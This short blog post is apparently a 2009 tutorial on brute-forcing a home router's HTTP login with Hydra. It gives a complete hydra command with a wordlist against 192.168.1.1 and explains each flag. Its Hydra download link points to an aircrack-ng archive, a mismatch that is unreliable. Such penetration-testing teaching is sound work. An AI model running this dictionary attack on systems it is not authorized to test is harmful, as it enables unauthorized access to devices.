Cracking HTTP Passwords (Hydra)

A basic guide on how to use hydra to crack a http password on a 'home' router.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Hydra.mp4

Method

  • Uses a dictionary attack to test for weak or simple passwords on one or more remote clients

Tools

  • Hydra
  • Big dictionary

Software

Name: Hydra

Version: 5.4

Home Page: http://freeworld.thc.org/

Download Link: hxxp://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz

Commands

1
2
3
4
5
6
7
8
9
10
11
12
hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get /

-l = username
-P = password (Looks for a wordlist)
-e ns = checks for 'null' password
-t xx= How many tasks to run at once
-f = exit once it finds the first user/password
-s = connect via SSL
-vV = verbose mode (shows more info)
192.168.1.1 = IP address
http-get = what to crack/method etc
/ = Page to crack - root

Notes

  • This is cut from my final video called "g0tmi1k's home network".
  • The password HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!

Song: Rage Against The Machine - Killing in the Name of (Mr. Oizo Remix)

Video length: 01:21

Capture length: 01:40

Blog Post: https://blog.g0tmi1k.com/2009/07/cracking-http-passwords-hydra/